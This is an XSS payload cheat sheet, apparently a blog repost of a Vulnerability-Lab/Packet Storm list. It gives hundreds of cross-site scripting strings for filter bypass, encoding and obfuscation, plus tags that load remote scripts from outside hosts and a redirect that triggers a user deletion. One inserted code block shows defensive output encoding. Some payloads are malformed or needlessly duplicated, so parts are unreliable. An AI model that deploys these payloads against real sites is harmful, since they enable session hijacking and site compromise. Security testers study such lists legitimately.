XSS Payload

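With XSS, the important thing is to infer the filter's rules from the output: open the developer tools (F12), construct your own XSS payload, split it up, close the brackets, then use the resulting errors to work out the filtering rules and look for a bypass.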

1. Simplest:
<script>alert(1)</script>

2. Simple URL encoding:
%22><img src=1 onerror =alert(/XSS/);>

3. When < and > are filtered:
javascript:alert(1)
"onmouseover="alert(1)

Definition and usage
The onmouseover event fires when the mouse pointer moves onto the specified element.
Syntax

onmouseover="alert(1)"

4. Breaking out:
 onmouseover=alert(1)
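
Why removing only `<` and `>` (step 3) does not stop the two strings listed there, and what closes the gap: encode for the attribute context and allow-list URL schemes. This is an added example, not code from the original page; the function names and the `<input>` template are assumptions made for illustration, and the inputs are constructed.

```javascript
// Added example: hypothetical helper names, constructed inputs.

// The weak filter from step 3: remove only angle brackets.
function stripAngleBrackets(s) {
  return String(s).replace(/[<>]/g, '');
}

// Encode for a quoted HTML attribute value: every character that can end
// the value or start markup becomes a numeric character reference.
function encodeAttr(s) {
  return String(s).replace(/[&<>"'`=]/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

// Assumed template: user input reflected into a double-quoted attribute.
function renderInput(value, encoder) {
  return '<input type="text" value="' + encoder(value) + '">';
}

// Small scanner for one start tag. It returns the attribute names a
// browser-style tokenizer would see, which makes an injected attribute visible.
function attributeNames(tag) {
  const names = [];
  let i = tag.search(/[\s/>]/); // position just after "<tagname"
  while (i >= 0 && i < tag.length) {
    while (i < tag.length && /[\s/]/.test(tag[i])) i++;
    if (i >= tag.length || tag[i] === '>') break;
    const start = i;
    while (i < tag.length && !/[\s/>=]/.test(tag[i])) i++;
    names.push(tag.slice(start, i).toLowerCase());
    while (i < tag.length && /\s/.test(tag[i])) i++;
    if (tag[i] !== '=') continue; // attribute without a value
    i++;
    while (i < tag.length && /\s/.test(tag[i])) i++;
    const q = tag[i];
    if (q === '"' || q === "'") {
      const end = tag.indexOf(q, i + 1);
      i = end < 0 ? tag.length : end + 1;
    } else {
      while (i < tag.length && !/[\s>]/.test(tag[i])) i++;
    }
  }
  return names;
}

// Encoding cannot neutralise a javascript: URL in href/src, so URL-valued
// attributes also need a scheme allow-list. Browsers drop tab, CR and LF
// from URLs and trim leading control characters and spaces, so do the same
// before looking at the scheme.
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];
function safeHref(url) {
  const cleaned = String(url)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  const m = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/.exec(cleaned);
  if (m && !ALLOWED_SCHEMES.includes(m[1].toLowerCase())) return '#';
  return cleaned; // relative URL or allowed scheme; still encode on output
}

function demo() {
  const payload = '"onmouseover="alert(1)'; // string from step 3
  return {
    weak: attributeNames(renderInput(payload, stripAngleBrackets)),
    hardened: attributeNames(renderInput(payload, encodeAttr)),
    href: safeHref('javascript:alert(1)'),
  };
}

console.log(demo());
```

With the weak filter the tag gains a third attribute, `onmouseover`; with attribute encoding the same input stays inside `value`.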

Commonly used payloads:
<img src=1 onmouseover=alert(1)>
<a href=1 onload=alert(1)>xx</a>
<body/onhashchange=alert(1)><a href=#>clickit (the alert fires when the anchor changes)
<objectdata=”data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4=”></object>
“><svg/onload=alert(/1/)>
XSS in an input tag (autofocus triggers it automatically; note that it cannot trigger when the hidden attribute is set)
112" name=javascript:alert(1) autofocus onfocus=location=this.name
112" name=javascript:alert1 autofocus onfocus=location=this.name

https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html

Note: This is a technical attack sheet for cross-site penetration tests.

Cross Site Scripting Strings with TAG:

<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
<IMG SRC="jav ascript:document.cookie=true;">
<IMG SRC="javascript:document.cookie=true;">
<IMG SRC=" javascript:document.cookie=true;">
<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
<SCRIPT>document.cookie=true;//<</SCRIPT>
<SCRIPT <B>document.cookie=true;</SCRIPT>
<IMG SRC="javascript:document.cookie=true;">
<iframe src="javascript:document.cookie=true;>
<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
<BODY BACKGROUND="javascript:document.cookie=true;">
<BODY ONLOAD=document.cookie=true;>
<IMG DYNSRC="javascript:document.cookie=true;">
<IMG LOWSRC="javascript:document.cookie=true;">
<BGSOUND SRC="javascript:document.cookie=true;">
<BR SIZE="&{document.cookie=true}">
<LAYER SRC="javascript:document.cookie=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
?script?document.cookie=true;?/script?
<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.cookie=true;">
<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="background-image: url(?javascript:document.cookie=true;)">
<DIV STYLE="width: expression(document.cookie=true);">
<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
<IMG STYLE="CrossSiteScripting:expr/
CrossSiteScripting/ession(document.cookie=true)">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
exp/
<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
<SCRIPT>document.cookie=true;</SCRIPT>
<BASE HREF="javascript:document.cookie=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.cookie=true;">
<div onmouseover="document.cookie=true;">
![](javascript:document.cookie=true;)
![](javascript:document.cookie=true;)
<input type="image" dynsrc="javascript:document.cookie=true;">
<bgsound src="javascript:document.cookie=true;">
&<script>document.cookie=true;</script>
&{document.cookie=true;};
<img src=&{document.cookie=true;};>
<link rel="stylesheet" href="javascript:document.cookie=true;">



<a href="about:<script>document.cookie=true;</script>">
<body onload="document.cookie=true;">
<div style="background-image: url(javascript:document.cookie=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<script>document.cookie=true;</script>

<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with close TAG:

"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
"<SCRIPT>document.cookie=true;</SCRIPT>
"<IMG SRC="jav ascript:document.cookie=true;">
"<IMG SRC="javascript:document.cookie=true;">
"<IMG SRC=" ? javascript:document.cookie=true;">
"<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
"<SCRIPT>document.cookie=true;//<</SCRIPT>
"<SCRIPT <B>document.cookie=true;</SCRIPT>
"<IMG SRC="javascript:document.cookie=true;">
"<iframe src="javascript:document.cookie=true;>
"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
"<BODY BACKGROUND="javascript:document.cookie=true;">
"<BODY ONLOAD=document.cookie=true;>
"<IMG DYNSRC="javascript:document.cookie=true;">
"<IMG LOWSRC="javascript:document.cookie=true;">
"<BGSOUND SRC="javascript:document.cookie=true;">
"<BR SIZE="&{document.cookie=true}">
"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
"?script?document.cookie=true;?/script?
"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
"<TABLE BACKGROUND="javascript:document.cookie=true;">
"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
"<DIV STYLE="background-image: url(?javascript:document.cookie=true;)">
"<DIV STYLE="width: expression(document.cookie=true);">
"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
"<IMG STYLE="CrossSiteScripting:expr/
CrossSiteScripting/ession(document.cookie=true)">
"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
"exp/
<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
"<SCRIPT>document.cookie=true;</SCRIPT>
"<BASE HREF="javascript:document.cookie=true;//">
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
"<a href="javascript#document.cookie=true;">
"<div onmouseover="document.cookie=true;">
"![](javascript:document.cookie=true;)
"![](javascript:document.cookie=true;)
"<input type="image" dynsrc="javascript:document.cookie=true;">
"<bgsound src="javascript:document.cookie=true;">
"&<script>document.cookie=true;</script>
"&{document.cookie=true;};
"<img src=&{document.cookie=true;};>
"<link rel="stylesheet" href="javascript:document.cookie=true;">
"


"

"<a href="about:<script>document.cookie=true;</script>">
"<body onload="document.cookie=true;">
"<div style="background-image: url(javascript:document.cookie=true;);">
"<div style="behaviour: url([link to code]);">
"<div style="binding: url([link to code]);">
"<div style="width: expression(document.cookie=true;);">
"<style type="text/javascript">document.cookie=true;</style>
"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
"<style></script>
"<<script>document.cookie=true;</script>
"<script>document.cookie=true;//--></script>
"<script>document.cookie=true;</script>
"

"<img src="blah>" onmouseover="document.cookie=true;">
"<xml src="javascript:document.cookie=true;">
"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with negative value & TAG:
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC=" ? javascript:document.cookie=true;">
-1<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;>
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
-1?script?document.cookie=true;?/script?
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url(?javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/
CrossSiteScripting/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
-1exp/
<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1![](javascript:document.cookie=true;)
-1![](javascript:document.cookie=true;)
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script>
-1&{document.cookie=true;};
-1<img src=&{document.cookie=true;};>
-1<link rel="stylesheet" href="javascript:document.cookie=true;">
-1


-1

-1<a href="about:<script>document.cookie=true;</script>">
-1<body onload="document.cookie=true;">
-1<div style="background-image: url(javascript:document.cookie=true;);">
-1<div style="behaviour: url([link to code]);">
-1<div style="binding: url([link to code]);">
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<script>document.cookie=true;</script>
-1

-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings Restriction Bypass Mail:

"<iframe src=http://vulnerability-lab.com/>@gmail.com
"<script>alert(document.cookie)</script><div style="1@gmail.com
"<script>alert(document.cookie)</script>@gmail.com

<iframe src=http://vulnerability-lab.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
<script>alert(document.cookie)</script>@gmail.com

Cross Site Scripting Strings Restriction Bypass Phone:
+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
<iframe src=http://vulnerability-lab.com>1337+1

Cross Site Scripting Strings Restriction Bypass Obfuscation

“<ScriPt>ALeRt("VlAb")</scriPt>
"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>

Cross Site Scripting Strings Restriction Bypass String to Charcode

<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
'';!--"<CrossSiteScripting>=&{()}

Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E

Cross Site Scripting Strings via Console:
set vlan name 1337 <script>alert(document.cookie)</script>
set system name <iframe src=http://www.vulnerability-lab.com>
set system location "><iframe src=a onload=alert("VL") <
set system contact <script>alert('VL')</script>

insert <script>alert(document.cookie)</script>
add
add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com

add topic <iframe src=http://www.vulnerability-lab.com>
add name <script>alert('VL')</script>

perl -e 'print "<IMG SRC=java\0script:alert("CrossSiteScripting")>";' > out
perl -e 'print "<SCR\0IPT>alert("CrossSiteScripting")</SCR\0IPT>";' > out

Cross Site Scripting Strings on per line validation applications:

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"

Cross Site Scripting Strings Embed:

<EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


Cross Site Scripting Strings Action Script:

   <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
       <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
             <param name="quality" value="high" />
             <param name="scale" value="noscale" />
             <param name="salign" value="LT" />
   <param name="allowScriptAccess" value="always" />
             <param name="menu" value="false" />
        </object>

<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
<<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
<SCRIPT SRC=//vulnerability-lab.com/.js>
<SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT a=> SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
</TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>

<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert("CrossSiteScripting")>
<IMG SRC=javascript:alert("RM'CrossSiteScripting'")>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav
ascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=" ? javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="http://vulnerability-lab.com/CrossSiteScripting.css; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-

<OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>

<STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>

<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(?javascript:alert('CrossSiteScripting'))">
<DIV STYLE="width: expression(alert('CrossSiteScripting'));">

<LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
<LINK REL="stylesheet" >

<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("CrossSiteScripting")>
<iframe src=http://vulnerability-lab.com/index.html <

<TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
<TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">

<BGSOUND SRC="javascript:alert('CrossSiteScripting');">
<BR SIZE="&{alert('CrossSiteScripting')}">

<A >CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>

<BASE HREF="javascript:alert('CrossSiteScripting');//">

";alert('CrossSiteScripting');//

<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">

<CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">

?script?alert(¢CrossSiteScripting¢)?/script?

<IMG STYLE="CrossSiteScripting:expr/CrossSiteScripting/ession(alert('CrossSiteScripting'))">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//"); CrossSiteScripting:ex/CrossSiteScripting///*/pression(alert("CrossSiteScripting"))'>

a="get";
b="URL("";
c="javascript:";
d="alert('CrossSiteScripting');")";
eval(v+l+a+b);

<HTML xmlns:CrossSiteScripting>
<?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
<CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:alert('CrossSiteScripting')"></B></I></XML>
<SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
</BODY></HTML>

<SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>

<? echo('<SCR)';
echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>

<IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

<iframe src=http://test.de>

